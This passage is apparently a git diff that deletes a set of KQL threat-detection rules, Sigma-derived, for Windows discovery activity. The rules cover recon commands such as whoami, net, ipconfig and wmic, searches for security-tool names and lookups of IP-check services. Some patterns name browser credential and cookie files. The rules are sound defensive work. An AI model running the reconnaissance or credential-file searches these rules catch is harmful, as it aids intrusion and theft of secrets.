-// Tags: attack.discovery, attack.t1057
-DeviceProcessEvents
-| where ProcessCommandLine contains "ipconfig /all | find " or ProcessCommandLine contains "ipconfig /all | findstr " or ProcessCommandLine contains "ipconfig | find " or ProcessCommandLine contains "ipconfig | findstr " or ProcessCommandLine contains "ipconfig.exe /all | find " or ProcessCommandLine contains "ipconfig.exe /all | findstr " or ProcessCommandLine contains "ipconfig.exe | find " or ProcessCommandLine contains "ipconfig.exe | findstr " or ProcessCommandLine contains "net start | find" or ProcessCommandLine contains "net start | findstr" or ProcessCommandLine contains "net.exe start | find" or ProcessCommandLine contains "net.exe start | findstr" or ProcessCommandLine contains "net1 start | find" or ProcessCommandLine contains "net1 start | findstr" or ProcessCommandLine contains "net1.exe start | find" or ProcessCommandLine contains "net1.exe start | findstr" or ProcessCommandLine contains "netstat -ano | find" or ProcessCommandLine contains "netstat -ano | findstr" or ProcessCommandLine contains "netstat | find" or ProcessCommandLine contains "netstat | findstr" or ProcessCommandLine contains "netstat.exe -ano | find" or ProcessCommandLine contains "netstat.exe -ano | findstr" or ProcessCommandLine contains "netstat.exe | find" or ProcessCommandLine contains "netstat.exe | findstr" or ProcessCommandLine contains "ping | find" or ProcessCommandLine contains "ping | findstr" or ProcessCommandLine contains "ping.exe | find" or ProcessCommandLine contains "ping.exe | findstr" or 
ProcessCommandLine contains "systeminfo | find " or ProcessCommandLine contains "systeminfo | findstr " or ProcessCommandLine contains "systeminfo.exe | find " or ProcessCommandLine contains "systeminfo.exe | findstr " or ProcessCommandLine contains "tasklist | find " or ProcessCommandLine contains "tasklist | findstr " or ProcessCommandLine contains "tasklist.exe | find " or ProcessCommandLine contains "tasklist.exe | findstr " or ProcessCommandLine contains "whoami /all | find " or ProcessCommandLine contains "whoami /all | findstr " or ProcessCommandLine contains "whoami.exe /all | find " or ProcessCommandLine contains "whoami.exe /all | findstr "
\ No newline at end of file
diff --git a/Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql b/Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
deleted file mode 100644
index 6b0bdff3..00000000
--- a/Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/19
-// Level: medium
-// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
-// Tags: attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592
-DeviceProcessEvents
-| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe")))
\ No newline at end of file
diff --git a/Discovery/Renamed_Whoami_Execution.kql b/Discovery/Renamed_Whoami_Execution.kql
deleted file mode 100644
index a0f2b785..00000000
--- a/Discovery/Renamed_Whoami_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/12
-// Level: critical
-// Description: Detects the execution of whoami that has been renamed to a different name to avoid detection
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "whoami.exe" and (not(FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql b/Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql
deleted file mode 100644
index 7cd541b4..00000000
--- a/Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/05/05
-// Level: high
-// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
-// Tags: attack.privilege_escalation, attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql b/Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql
deleted file mode 100644
index 8d531a86..00000000
--- a/Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023/10/20
-// Level: medium
-// Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
-This detection focuses on the keywords that the attacker might use as a filter.
-
-// Tags: attack.discovery, attack.t1518.001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " avira" or ProcessCommandLine endswith " avira\"" or ProcessCommandLine endswith " cb" or ProcessCommandLine endswith " cb\"" or ProcessCommandLine endswith " cylance" or ProcessCommandLine endswith " cylance\"" or ProcessCommandLine endswith " defender" or ProcessCommandLine endswith " defender\"" or ProcessCommandLine endswith " kaspersky" or ProcessCommandLine endswith " kaspersky\"" or ProcessCommandLine endswith " kes" or ProcessCommandLine endswith " kes\"" or ProcessCommandLine endswith " mc" or ProcessCommandLine endswith " mc\"" or ProcessCommandLine endswith " sec" or ProcessCommandLine endswith " sec\"" or ProcessCommandLine endswith " sentinel" or ProcessCommandLine endswith " sentinel\"" or ProcessCommandLine endswith " symantec" or ProcessCommandLine endswith " symantec\"" or ProcessCommandLine endswith " virus" or ProcessCommandLine endswith " virus\"") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql b/Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql
deleted file mode 100644
index 4dbec23f..00000000
--- a/Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Endgame, JHasenbusch (ported for oscd.community)
-// Date: 2018/10/30
-// Level: low
-// Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
-// Tags: attack.discovery, attack.t1018
-DeviceProcessEvents
-| where (ProcessCommandLine contains "view" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine contains "\\\\"))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Execution_of_Hostname.kql b/Discovery/Suspicious_Execution_of_Hostname.kql
deleted file mode 100644
index be1ee918..00000000
--- a/Discovery/Suspicious_Execution_of_Hostname.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: low
-// Description: Use of hostname to get information
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where FolderPath endswith "\\HOSTNAME.EXE"
\ No newline at end of file
diff --git a/Discovery/Suspicious_Execution_of_Systeminfo.kql b/Discovery/Suspicious_Execution_of_Systeminfo.kql
deleted file mode 100644
index e6aa3bdf..00000000
--- a/Discovery/Suspicious_Execution_of_Systeminfo.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: low
-// Description: Detects usage of the "systeminfo" command to retrieve information
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where FolderPath endswith "\\systeminfo.exe" or ProcessVersionInfoOriginalFileName =~ "sysinfo.exe"
\ No newline at end of file
diff --git a/Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql b/Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql
deleted file mode 100644
index 45d9b7ac..00000000
--- a/Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
-Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
-
-// Tags: attack.discovery, attack.t1087.001, attack.t1087.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ((((ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto" or ProcessCommandLine contains " /do") and (ProcessCommandLine contains " group " or ProcessCommandLine contains " localgroup ")) and (not(ProcessCommandLine contains " /add"))) or (ProcessCommandLine contains " /do" and ProcessCommandLine contains " accounts "))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql b/Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql
deleted file mode 100644
index 34357fc4..00000000
--- a/Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/28
-// Level: high
-// Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "syscall:::return" and ProcessCommandLine contains "lkd(") or (ProcessCommandLine contains "lkd(0)" and FolderPath endswith "\\dtrace.exe")
\ No newline at end of file
diff --git a/Discovery/Suspicious_Network_Command.kql b/Discovery/Suspicious_Network_Command.kql
deleted file mode 100644
index 1125f58f..00000000
--- a/Discovery/Suspicious_Network_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2021/12/07
-// Level: low
-// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
-// Tags: attack.discovery, attack.t1016
-DeviceProcessEvents
-| where ProcessCommandLine contains "ipconfig /all" or ProcessCommandLine contains "netsh interface show interface" or ProcessCommandLine contains "arp -a" or ProcessCommandLine contains "nbtstat -n" or ProcessCommandLine contains "net config" or ProcessCommandLine contains "route print"
\ No newline at end of file
diff --git a/Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql b/Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql
deleted file mode 100644
index 2324716d..00000000
--- a/Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/24
-// Level: medium
-// Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
-// Tags: attack.discovery, attack.t1016
-DeviceNetworkEvents
-| where ((RemoteUrl in~ ("www.ip.cn", "l2.io")) or (RemoteUrl contains "api.2ip.ua" or RemoteUrl contains "api.bigdatacloud.net" or RemoteUrl contains "api.ipify.org" or RemoteUrl contains "bot.whatismyipaddress.com" or RemoteUrl contains "canireachthe.net" or RemoteUrl contains "checkip.amazonaws.com" or RemoteUrl contains "checkip.dyndns.org" or RemoteUrl contains "curlmyip.com" or RemoteUrl contains "db-ip.com" or RemoteUrl contains "edns.ip-api.com" or RemoteUrl contains "eth0.me" or RemoteUrl contains "freegeoip.app" or RemoteUrl contains "geoipy.com" or RemoteUrl contains "getip.pro" or RemoteUrl contains "icanhazip.com" or RemoteUrl contains "ident.me" or RemoteUrl contains "ifconfig.io" or RemoteUrl contains "ifconfig.me" or RemoteUrl contains "ip-api.com" or RemoteUrl contains "ip.360.cn" or RemoteUrl contains "ip.anysrc.net" or RemoteUrl contains "ip.taobao.com" or RemoteUrl contains "ip.tyk.nu" or RemoteUrl contains "ipaddressworld.com" or RemoteUrl contains "ipapi.co" or RemoteUrl contains "ipconfig.io" or RemoteUrl contains "ipecho.net" or RemoteUrl contains "ipinfo.io" or RemoteUrl contains "ipip.net" or RemoteUrl contains "ipof.in" or RemoteUrl contains "ipv4.icanhazip.com" or RemoteUrl contains "ipv4bot.whatismyipaddress.com" or RemoteUrl contains "ipv6-test.com" or RemoteUrl contains "ipwho.is" or RemoteUrl contains "jsonip.com" or RemoteUrl contains "myexternalip.com" or RemoteUrl contains "seeip.org" or RemoteUrl contains "wgetip.com" or RemoteUrl contains "whatismyip.akamai.com" or RemoteUrl contains "whois.pconline.com.cn" or RemoteUrl contains "wtfismyip.com")) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Query_of_MachineGUID.kql b/Discovery/Suspicious_Query_of_MachineGUID.kql
deleted file mode 100644
index 220d7db0..00000000
--- a/Discovery/Suspicious_Query_of_MachineGUID.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: low
-// Description: Use of reg to get MachineGuid information
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Cryptography" and ProcessCommandLine contains "/v " and ProcessCommandLine contains "MachineGuid") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql b/Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql
deleted file mode 100644
index 6dcb8c45..00000000
--- a/Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/10
-// Level: medium
-// Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet
-// Tags: attack.discovery, attack.t1087.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Get-LocalGroupMember " and (ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto")
\ No newline at end of file
diff --git a/Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
deleted file mode 100644
index 62278102..00000000
--- a/Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: high
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Scan_Loop_Network.kql b/Discovery/Suspicious_Scan_Loop_Network.kql
deleted file mode 100644
index 19d4fbec..00000000
--- a/Discovery/Suspicious_Scan_Loop_Network.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/12
-// Level: medium
-// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
-// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018
-DeviceProcessEvents
-| where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping")
\ No newline at end of file
diff --git a/Discovery/Suspicious_Use_of_PsLogList.kql b/Discovery/Suspicious_Use_of_PsLogList.kql
deleted file mode 100644
index b0aeb239..00000000
--- a/Discovery/Suspicious_Use_of_PsLogList.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/18
-// Level: medium
-// Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
-// Tags: attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains " security" or ProcessCommandLine contains " application" or ProcessCommandLine contains " system") and (ProcessCommandLine contains " -d" or ProcessCommandLine contains " /d" or ProcessCommandLine contains " -x" or ProcessCommandLine contains " /x" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " /c" or ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g") and (ProcessVersionInfoOriginalFileName =~ "psloglist.exe" or (FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe"))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Where_Execution.kql b/Discovery/Suspicious_Where_Execution.kql
deleted file mode 100644
index ac7bc0f8..00000000
--- a/Discovery/Suspicious_Where_Execution.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/13
-// Level: low
-// Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts.
-Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
-internal network resources such as servers, tools/dashboards, or other related infrastructure.
-
-// Tags: attack.discovery, attack.t1217
-DeviceProcessEvents
-| where (FolderPath endswith "\\where.exe" or ProcessVersionInfoOriginalFileName =~ "where.exe") and (ProcessCommandLine contains "places.sqlite" or ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "formhistory.sqlite" or ProcessCommandLine contains "logins.json" or ProcessCommandLine contains "key4.db" or ProcessCommandLine contains "key3.db" or ProcessCommandLine contains "sessionstore.jsonlz4" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Login Data")
\ No newline at end of file
diff --git a/Discovery/Sysinternals_PsService_Execution.kql b/Discovery/Sysinternals_PsService_Execution.kql
deleted file mode 100644
index f02b57a4..00000000
--- a/Discovery/Sysinternals_PsService_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/16
-// Level: medium
-// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
-// Tags: attack.discovery, attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe")
\ No newline at end of file
diff --git a/Discovery/Sysinternals_PsSuspend_Execution.kql b/Discovery/Sysinternals_PsSuspend_Execution.kql
deleted file mode 100644
index fe4d7335..00000000
--- a/Discovery/Sysinternals_PsSuspend_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/23
-// Level: medium
-// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
-// Tags: attack.discovery, attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")
\ No newline at end of file
diff --git a/Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql b/Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql
deleted file mode 100644
index 8bbe1a9b..00000000
--- a/Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/16
-// Level: high
-// Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
-// Tags: attack.discovery, attack.t1518.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " 385201" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql b/Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index e0972b4b..00000000
--- a/Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Stephen Lincoln `@slincoln-aiq`(AttackIQ)
-// Date: 2024/02/02
-// Level: medium
-// Description: An adversary might use WMI to discover information about the system, such as the volume name, size,
-free space, and other disk information. This can be done using the `wmic` command-line utility and has been
-observed being used by threat actors such as Volt Typhoon.
-
-// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "volume" or ProcessCommandLine contains "path win32_logicaldisk") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql b/Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql
deleted file mode 100644
index 6728dc2d..00000000
--- a/Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/10
-// Level: low
-// Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
-// Tags: attack.discovery, attack.t1049
-DeviceProcessEvents
-| where ((ProcessCommandLine endswith " use" or ProcessCommandLine endswith " sessions") or (ProcessCommandLine contains " use " or ProcessCommandLine contains " sessions ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql b/Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql
deleted file mode 100644
index de756d78..00000000
--- a/Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: TropChaud
-// Date: 2023/01/26
-// Level: medium
-// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
-including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
-and GPU driver products/versions.
-Some of these commands were used by Aurora Stealer in late 2022/early 2023.
-
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "LOGICALDISK get Name,Size,FreeSpace" or ProcessCommandLine contains "os get Caption,OSArchitecture,Version") and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/Discovery/Use_of_W32tm_as_Timer.kql b/Discovery/Use_of_W32tm_as_Timer.kql
deleted file mode 100644
index 4e1a4aef..00000000
--- a/Discovery/Use_of_W32tm_as_Timer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/09/25
-// Level: high
-// Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism
-// Tags: attack.discovery, attack.t1124
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/stripchart" and ProcessCommandLine contains "/computer:" and ProcessCommandLine contains "/period:" and ProcessCommandLine contains "/dataonly" and ProcessCommandLine contains "/samples:") and (FolderPath endswith "\\w32tm.exe" or ProcessVersionInfoOriginalFileName =~ "w32time.dll")
\ No newline at end of file
diff --git a/Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql b/Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql
deleted file mode 100644
index e31beff7..00000000
--- a/Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
-// Tags: attack.discovery, attack.t1033
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADUser " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Discovery/WhoAmI_as_Parameter.kql b/Discovery/WhoAmI_as_Parameter.kql
deleted file mode 100644
index f6fc51e8..00000000
--- a/Discovery/WhoAmI_as_Parameter.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/29
-// Level: high
-// Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where ProcessCommandLine contains ".exe whoami"
\ No newline at end of file
diff --git a/Discovery/Whoami.EXE_Execution_Anomaly.kql b/Discovery/Whoami.EXE_Execution_Anomaly.kql
deleted file mode 100644
index 67453cb8..00000000
--- a/Discovery/Whoami.EXE_Execution_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/12
-// Level: medium
-// Description: Detects the execution of whoami.exe with suspicious parent processes.
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") and (not(((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") or InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) and (not(InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe"))
\ No newline at end of file
diff --git a/Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql b/Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql
deleted file mode 100644
index 35ff8ce9..00000000
--- a/Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov
-// Date: 2022/01/28
-// Level: high
-// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
-// Tags: attack.privilege_escalation, attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller")
\ No newline at end of file
diff --git a/Discovery/Whoami.EXE_Execution_With_Output_Option.kql b/Discovery/Whoami.EXE_Execution_With_Output_Option.kql
deleted file mode 100644
index dfb76c22..00000000
--- a/Discovery/Whoami.EXE_Execution_With_Output_Option.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
